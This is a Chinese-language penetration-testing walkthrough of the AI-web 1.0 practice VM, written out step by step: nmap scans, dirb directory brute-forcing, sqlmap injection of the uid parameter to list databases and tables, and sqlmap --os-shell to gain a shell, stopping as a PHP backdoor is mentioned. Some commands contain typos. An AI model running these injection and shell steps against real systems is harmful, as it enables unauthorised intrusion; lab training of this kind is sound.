AI-web 1.0靶机学习渗透测试靶机学习

AI-web 1.0靶机学习第一步、主机发现我们尝试使用nmap的二层发现功能进行主机扫描

nmap -sn 192.168.153.0/24

文章图片

第二步、端口扫描我们初步确定靶机IP为192.168.153.135后，继续使用nmap进行端口扫描和信息收集。

nmap -A -p 1-65535 192.168.153.135 -T4

文章图片

我们发现靶机的80端口上运行apache服务，并且发现了一个文件上传的目录
我们尝试访问该ip的80端口,发现页面只有一句没什么用的话。。。

文章图片

第三步、web信息收集我们使用dirsearch工具尝试扫一下网站的目录。

dirb http://192.168.153.135

文章图片

发现目录下存在robots.txt文件，我们看看里面有没有什么敏感文件。

文章图片

文件里给出了三个目录，我们依次进行访问，发现只有 /se3reTdir777/目录可以正常访问，发现是一个登陆点。

文章图片

我们输入任意数字，进行抓包判断，发现明显的注入点uid。使用sqlmap进行自动化扫描。

文章图片

第四步、sqlmap自动化注入我们使用sqlmap进行自动化扫描。

python sqlmap.py -u "http://192.168.153.135/se3reTdir777/" --data "uid=1&peration=Submit" --dbs --batch

得到了我们想要的数据库 aiweb1

文章图片

继续对目标数据库中的表进行探测

python sqlmap.py -u "http:192.168.153.135/se3reTdir777/"--data "uid=1&peration=Submit" -Daiweb1 --tables --batch

文章图片

探测字段

sqlmap -u "http://192.168.153.135/se3reTdir777/" --data "uid=1&Operation=Submit"-D aiweb1 -T user --columns --batch

文章图片

发现没有我们想要的信息。。。。。。只能换思路。
第五步、sqlmap反弹shell 我们发现之前robots下存在一个 /m3diNf0/ 目录禁止访问，我们这里再次对其进行爆破。

dirb http://192.168.153.135/m3diNf0/

文章图片

我们发现目录下存在一个info.php，我们尝试对其进行访问。
发现这是一个phpinfo配置页面。并且在其中发现了网站的根目录在home下。
知道了网站的根目录，我们就可以尝试使用sqlmap反弹shell。

sqlmap -u "http://192.168.153.135/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell

文章图片

依次选择4:php web server
? 2:custom location
网站路径：/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
? PS：优先选择此路径的原因是sql注入在该页面下。
第六步、php后门反弹shell ? 提示需要一个终端，所以我们得想办法反弹一个shell。在这里我们已经得到一个shell，可以写一个后门，在这里写一个php后门。